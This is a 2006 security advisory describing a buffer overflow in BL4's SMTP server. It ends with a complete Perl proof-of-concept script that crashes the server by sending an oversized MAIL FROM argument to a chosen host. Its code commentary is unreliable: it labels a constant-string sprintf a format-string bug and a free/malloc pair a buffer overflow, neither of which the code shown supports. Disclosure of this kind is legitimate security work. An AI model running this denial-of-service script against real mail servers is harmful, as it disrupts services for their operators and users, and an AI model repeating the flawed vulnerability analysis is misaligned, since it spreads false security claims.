--------------------------------------------------------------------------- [ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable --------------------------------------------------------------------------- Author : Dedi Dwianto Date : April, 27th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt Critical Lvl : High --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : BL4's SMTP server version : < 0.1.5 URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0 Description : BL4's SMTP server is an inbound only SMTP server. It currently uses hardcoded values for handling email. The SMTP server puts the incoming email into various text files. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~~~ BL4's SMTP server is to a flaw that can allow remote attacker to cause a denial of service or a attacker can Execution of Arbitrary Code. The vulnerability is due to a buffer overflow in the SMTP service. A remote attacker can repeatedly send more that 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server. ------------------think.c----------------------------------- ........... { slaveEmail[x]->isData = 0; slaveEmail[x]->emailFrom = 0; slaveEmail[x]->emailTo = 0; free(buffer); buffer = malloc(sizeof(char) * 12); sprintf(buffer, "250 OK\r\n"); return buffer; } free(buffer); ............. slaveEmail[x]->EHLO = buffer; slaveEmail[x]->EHLOtrue = 1; buffer = malloc(sizeof(char) * 12); sprintf(buffer, "250 OK\r\n"); return buffer; ----------------------------------------------------------- -- sprintf(buffer, "250 OK\r\n"); -- Vulnerable for format strings. -- free(buffer); buffer = malloc(sizeof(char) * 12); -- Vulnerable for buffer overflow. A attacker can create Arbitrary Code here . Poc: ~~~~~~~~~~~~ #!/usr/bin/perl use IO::Socket; use Socket; my($socket) = ""; if($#ARGV < 1 | $#ARGV > 2) {usage()} if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" }; $adr = $ARGV[0]; $prt = $ARGV[1]; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr, PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n"; print " -- Connecting To SMTP server at $adr port $prt ... \n"; sleep(1); print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n"; sleep(1); print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n"; sleep(1); printf("[+]Ok!\n"); printf("[+]Crash service.....\n"); printf("[~]Done.\n"); close($socket); sub usage() { print "\n=========================================\r\n"; print " BL4's SMTP server Remote DOS \r\n"; print "=========================================\r\n"; print " Bug Found by Dedi Dwianto \r\n"; print " www.echo.or.id #e-c-h-o irc.dal.net \r\n"; print " Echo Security Research Group \r\n"; print "=========================================\r\n"; print " Usage: perl bl4-explo.pl [target] [port] \r\n\n"; exit(); } --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous ~ newbie_hacker@yahoogroups.com ~ #aikmel #e-c-h-o @irc.dal.net --------------------------------------------------------------------------- Contact: ~~~~~~~~ Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------